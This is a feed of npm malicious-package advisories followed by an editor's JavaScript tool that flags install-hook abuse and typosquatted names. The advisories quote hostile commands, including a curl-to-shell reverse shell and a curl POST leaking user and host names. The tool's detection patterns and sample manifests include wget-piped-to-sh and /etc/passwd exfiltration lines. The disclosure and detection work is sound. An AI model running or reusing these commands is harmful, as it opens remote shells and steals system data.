Malicious Package: ganache-cli-provider
Overview: ganache-cli-provider is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
Malicious Package: foundy-toolkit
Overview: foundy-toolkit is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
MAL-2026-4232 Malicious code in build-integrity-verify (npm)
Source: amazon-inspector 2a4941223186440162de6c5ce0a5a5797589d69e6957473761b04818b8b9b5e7. The package contains no functionality of its own. Its postinstall lifecycle hook runs npx env-security-scanner@latest auditenvironment via...
Malicious code in dependency-audit-tool (npm)
Source: amazon-inspector 07144a70b38d5ada8c75d4cb8027f378cca7c094f823a544d056b07cb999e663. package.json declares a postinstall hook that runs node -e "try{require('child_process').execSync('npx env-security-scanner@latest...
Malicious code in python-env-auditor (npm)
Source: amazon-inspector 32ffd6ffbc7ab684cc6bd3dbbd29d4bb608f07ea2b9d2ffd460e95a279824699. The package fetches and executes a mutable, unpinned third-party npm package, env-security-scanner@latest, on every install and on every Python import. The...
MAL-2026-4585 Malicious code in internallib_v493 (npm)
Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7. The package's sole exported function, command in index.js, executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...
MAL-2026-4582 Malicious code in ignite-market-contracts (npm)
Source: amazon-inspector 3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc. The package's preinstall lifecycle hook in package.json runs wget --quiet...
NPM: JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection
Vulnerability in the npm package js-cookie, discovered by ?, affecting versions = 3.0.5...
Malicious code in @rui.branco/sentry-mcp (npm)
Source: amazon-inspector 8504c65903895f53054fc6df861469ddbac73c130793bd784d47eca8ef2cd65b. On every load of index.js (the package's main and bin entry), the package queries GitHub for the latest commit SHA on HEAD of rui-branco/sentry-mcp and...
MAL-2026-4424 Malicious code in @remitee-money-transfer/rmt-base (npm)
Source: amazon-inspector 5f21c6601855c2f2d0a5d0761d3defe8c0ba1708dd2a67fb278c03e0abd6ba16. The package ships only a preinstall lifecycle script, scripts/preinstall.sh, and no functional code. On npm install, the script reads /etc/passwd and...
NPM: NocoDB: Attachment Size Limit Bypass via Upload-by-URL
Vulnerability in the npm package nocodb, discovered by ?, affecting versions = 0.301.3...
Malicious code in @jaggle/resizeobserves (npm)
Source: amazon-inspector 3fe4b050d79ecfc702c9222cf3347e49d4530efd23a2120ee040ef32e0a76e4f. The package name impersonates the popular @juggle/resize-observer (u→a substitution in the scope and a pluralized 'resizeobserves'), and the README is copied verbatim from...
Malicious code in @kyungseopk1m/holidays-kr (npm)
Source: amazon-inspector f8538f74ec98ab5287a941ebac99e8624ba40d809edbc5b033da1150254d8215. On import/use, dist/cjs/index.js and dist/mjs/index.js call fetch against the hardcoded endpoint https://kdata.kxxseop.workers.dev with data sourced...
Malicious code in chai-as-tuned (npm)
Source: amazon-inspector f7e00f81e117716cfd7fd3565cf8b04073cd494a6da2c23749669133806a7473. The package name chai-as-tuned impersonates chai-as-promised and ships a README copy-pasted from the unrelated pino project; its npm/CI badges point at...
Malicious code in veteran (npm)
Source: amazon-inspector 70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4. On npm install, the package's postinstall hook, install.js (registered at package.json line 10 as "postinstall": "node install.js"), downloads a...
Malicious code in celonix-otp-react (npm)
Source: amazon-inspector df58532b5edb3f7a5ad9734a7f4fa46f062c0f220d578db42a223188d078d9bb. The package presents itself as a React OTP component, but its only exported widget hardcodes a single Firebase Realtime Database URL...
Malicious code in @vino.tian/vibe-kanban (npm)
Source: amazon-inspector 7f1533bb7e55b1bcd10291aa9f19e2a5cbe5755a7a6a7343d38fbd3ff8064a1f. This package is published as @vino.tian/vibe-kanban and copies its README, name, and feature description from BloopAI's legitimate vibe-kanban projec...
MAL-2026-4229 Malicious code in @luke-101141/nobody (npm)
Source: amazon-inspector 8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8. On require, index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/", leaking the installing user'...
Malicious Package: chai-as-afforded
Overview: chai-as-afforded is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
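The entries above share two install-time patterns: lifecycle hooks (preinstall/postinstall) that pull and run remote code (build-integrity-verify, dependency-audit-tool, ignite-market-contracts, @remitee-money-transfer/rmt-base, veteran), and package names that imitate a popular package (@jaggle/resizeobserves, chai-as-tuned). The following is an added editor's example, not code from any package or advisory listed here: a small manifest audit that flags those patterns in a package.json before it is installed. The rule regexes, the allowlist of popular names, the severity labels and every sample manifest are constructed for this example.

```javascript
// Added example (editor's code, not from any package or advisory listed above).
// Audits an npm package.json for the install-time behaviours these MAL entries
// describe: lifecycle hooks that run an unpinned `npx <pkg>@latest`, `node -e`
// with child_process, curl/wget piped into a shell, or reads of /etc/passwd,
// plus package names within two edits of, or sharing a long prefix with, a
// well-known package (the @juggle/resize-observer -> @jaggle/resizeobserves
// and chai-as-promised -> chai-as-tuned pattern). Every rule, the allowlist
// and every sample manifest below are constructed for this example.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns tested against each lifecycle script; any hit is rated "high".
const SCRIPT_RULES = [
  { id: 'remote-npx-latest', re: /\bnpx\s+(?:-y\s+)?[@\w./-]+@latest\b/ },
  { id: 'node-eval-child-process', re: /\bnode\s+-e\b.*child_process/ },
  { id: 'download-pipe-shell', re: /\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b/ },
  { id: 'download-tool', re: /\b(?:curl|wget)\s/ },
  { id: 'reads-etc-passwd', re: /\/etc\/passwd\b/ },
];

// Constructed allowlist; a real deployment would use a registry top-N list.
const POPULAR_NAMES = ['@juggle/resize-observer', 'chai-as-promised', 'ganache-cli', 'js-cookie'];

function normalizeName(name) {
  return name.toLowerCase().replace(/[^a-z0-9]/g, '');
}

// Plain Levenshtein distance (insert, delete, substitute at cost 1).
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const up = row[j];
      row[j] = Math.min(up + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = up;
    }
  }
  return row[b.length];
}

function commonPrefixLength(a, b) {
  let n = 0;
  while (n < a.length && n < b.length && a[n] === b[n]) n += 1;
  return n;
}

// Returns the known package a name imitates, or null for an exact or unrelated
// name. Edit distance catches character swaps (jaggle/juggle); the prefix rule
// catches a swapped final word (chai-as-tuned) but is noisier, so it is "low".
function lookalikeOf(name, knownNames = POPULAR_NAMES, maxDistance = 2, minPrefix = 6) {
  const n = normalizeName(name);
  if (knownNames.some((k) => normalizeName(k) === n)) return null;
  for (const known of knownNames) {
    const k = normalizeName(known);
    if (editDistance(n, k) <= maxDistance) return { lookalike: known, reason: 'edit-distance', severity: 'medium' };
    if (commonPrefixLength(n, k) >= minPrefix) return { lookalike: known, reason: 'shared-prefix', severity: 'low' };
  }
  return null;
}

function auditManifest(manifest, knownNames = POPULAR_NAMES) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const rules = SCRIPT_RULES.filter((r) => r.re.test(cmd)).map((r) => r.id);
    // Any lifecycle script runs arbitrary code at install time, so even a
    // rule-free one (e.g. `node install.js`) is reported for manual review.
    findings.push({ kind: 'lifecycle', hook, cmd, rules, severity: rules.length ? 'high' : 'review' });
  }
  const look = lookalikeOf(manifest.name || '', knownNames);
  if (look) findings.push({ kind: 'lookalike', name: manifest.name, ...look });
  return findings;
}

// Constructed manifests mirroring the behaviours in the entries above
// (198.51.100.7 is a documentation address, not a real host).
const SAMPLES = [
  { name: 'sample-npx-latest', scripts: { postinstall: 'npx evil-scanner@latest audit' } },
  { name: 'sample-node-eval',
    scripts: { postinstall: 'node -e "try{require(\'child_process\').execSync(\'npx evil-scanner@latest\')}catch(e){}"' } },
  { name: 'sample-wget-pipe', scripts: { preinstall: 'wget --quiet -O- http://198.51.100.7/x.sh | sh' } },
  { name: 'sample-passwd-read',
    scripts: { preinstall: 'cat /etc/passwd | curl -X POST --data-binary @- http://198.51.100.7/collect' } },
  { name: 'sample-postinstall-review', scripts: { postinstall: 'node install.js' } },
  { name: '@jaggle/resizeobserves', scripts: {} },
  { name: 'chai-as-tuned', scripts: { test: 'mocha' } },
  { name: 'sample-clean', scripts: { test: 'node --test' } },
];

function auditAll(manifests = SAMPLES) {
  const out = {};
  for (const m of manifests) out[m.name] = auditManifest(m);
  return out;
}

for (const [name, findings] of Object.entries(auditAll())) {
  console.log(name, findings.length ? JSON.stringify(findings) : 'no findings');
}
```

Two caveats a practitioner should keep in mind. First, a manifest audit only covers install-time hooks; several entries above (internallib_v493, @luke-101141/nobody, @kyungseopk1m/holidays-kr) do their work on require() or import, so `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) blocks the lifecycle class but not the run-time class. Second, the regexes and the prefix heuristic are illustrative: a lifecycle hook that downloads through a custom Node script rather than curl/wget, or an obfuscated command, will not match, so treat any lifecycle script on an unfamiliar package as worth reading.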